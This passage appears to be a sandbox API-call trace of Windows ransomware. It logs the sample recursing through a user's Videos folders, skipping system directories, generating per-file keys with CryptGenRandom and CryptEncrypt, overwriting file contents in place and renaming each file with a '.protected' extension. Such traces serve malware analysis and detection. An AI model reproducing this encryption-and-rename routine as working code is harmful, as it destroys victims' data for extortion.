wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq") returned 56 [0093.029] lstrcmpW (lpString1="wljq", lpString2=".") returned 1 [0093.029] lstrcmpW (lpString1="wljq", lpString2="..") returned 1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\*") returned 58 [0093.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.029] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.029] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\.") returned 58 [0093.029] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.029] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.029] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.029] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.029] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\..") returned 59 [0093.029] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.029] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.029] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.029] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Windows") returned 1 [0093.029] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Program Files") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="Program Files (x86)") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="$Recycle.bin") returned 1 [0093.030] lstrcmpiW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="System Volume Information") returned 1 [0093.030] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrIW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".protected") returned 0x0 [0093.030] lstrcmpW (lpString1="Yq B68QjPFHJWLVnCZiX.swf", lpString2="RESTORE_FILES.txt") returned 1 [0093.030] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".txt") returned 0x0 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".rar") returned 0x0 [0093.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf") returned 81 [0093.030] StrStrW (lpFirst="Yq B68QjPFHJWLVnCZiX.swf", lpSrch=".zip") returned 0x0 [0093.030] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x1654, lpOverlapped=0x0) returned 1 [0093.031] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffe9ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x1654, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x1654, lpOverlapped=0x0) returned 1 [0093.031] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0093.031] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0093.031] CloseHandle (hObject=0xd8) returned 1 [0093.032] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf.protected") returned 91 [0093.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\Yq B68QjPFHJWLVnCZiX.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\yq b68qjpfhjwlvnczix.swf.protected")) returned 1 [0093.032] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Windows") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Program Files") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="Program Files (x86)") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="$Recycle.bin") returned 1 [0093.032] lstrcmpiW (lpString1="z2RipTdMsu.flv", lpString2="System Volume Information") returned 1 [0093.032] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrIW (lpFirst="z2RipTdMsu.flv", lpSrch=".protected") returned 0x0 [0093.033] lstrcmpW (lpString1="z2RipTdMsu.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW (lpFirst="z2RipTdMsu.flv", lpSrch=".txt") returned 0x0 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW (lpFirst="z2RipTdMsu.flv", lpSrch=".rar") returned 0x0 [0093.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv") returned 71 [0093.033] StrStrW (lpFirst="z2RipTdMsu.flv", lpSrch=".zip") returned 0x0 [0093.033] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0093.034] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0093.034] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0093.034] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0093.034] CloseHandle (hObject=0xd8) returned 1 [0093.034] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv.protected") returned 81 [0093.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\z2RipTdMsu.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\z2riptdmsu.flv.protected")) returned 1 [0093.035] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Windows") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Program Files") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="Program Files (x86)") returned -1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="$Recycle.bin") returned 1 [0093.035] lstrcmpiW (lpString1="_7Z4", lpString2="System Volume Information") returned -1 [0093.035] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4") returned 61 [0093.035] lstrcmpW (lpString1="_7Z4", lpString2=".") returned 1 [0093.035] lstrcmpW (lpString1="_7Z4", lpString2="..") returned 1 [0093.035] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\*") returned 63 [0093.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.035] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.035] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\.") returned 63 [0093.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.036] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\..") returned 64 [0093.036] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.036] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.036] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Windows") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Program Files") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="Program Files (x86)") returned -1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="$Recycle.bin") returned 1 [0093.036] lstrcmpiW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="System Volume Information") returned -1 [0093.036] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.036] StrStrIW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".protected") returned 0x0 [0093.036] lstrcmpW (lpString1="EOdqj_9ITm0IDt-2f.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.036] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.036] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".txt") returned 0x0 [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".rar") returned 0x0 [0093.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4") returned 83 [0093.037] StrStrW (lpFirst="EOdqj_9ITm0IDt-2f.mp4", lpSrch=".zip") returned 0x0 [0093.037] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.037] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.037] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.038] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.038] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.038] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.038] CloseHandle (hObject=0x14c) returned 1 [0093.038] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4.protected") returned 93 [0093.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\EOdqj_9ITm0IDt-2f.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\eodqj_9itm0idt-2f.mp4.protected")) returned 1 [0093.039] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Windows") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Program Files") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="Program Files (x86)") returned -1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="$Recycle.bin") returned 1 [0093.039] lstrcmpiW (lpString1="htO1HkZfrSYC4.mp4", lpString2="System Volume Information") returned -1 [0093.039] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.039] StrStrIW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".protected") returned 0x0 [0093.039] lstrcmpW (lpString1="htO1HkZfrSYC4.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".txt") returned 0x0 [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".rar") returned 0x0 [0093.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4") returned 79 [0093.040] StrStrW (lpFirst="htO1HkZfrSYC4.mp4", lpSrch=".zip") returned 0x0 [0093.040] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x17e9, lpOverlapped=0x0) returned 1 [0093.041] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe817, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x17e9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x17e9, lpOverlapped=0x0) returned 1 [0093.041] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.041] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.041] CloseHandle (hObject=0x14c) returned 1 [0093.041] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4.protected") returned 89 [0093.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\htO1HkZfrSYC4.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\_7z4\\hto1hkzfrsyc4.mp4.protected")) returned 1 [0093.042] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Windows") returned -1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Program Files") returned -1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="Program Files (x86)") returned -1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="$Recycle.bin") returned 1 [0093.042] lstrcmpiW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="System Volume Information") returned -1 [0093.042] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\_7Z4\\i4K5ZpOUBo_pU4.mp4") returned 80 [0093.042] StrStrIW (lpFirst="i4K5ZpOUBo_pU4.mp4", lpSrch=".protected") returned 0x0 [0093.042] lstrcmpW (lpString1="i4K5ZpOUBo_pU4.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0093.042] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.042] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | 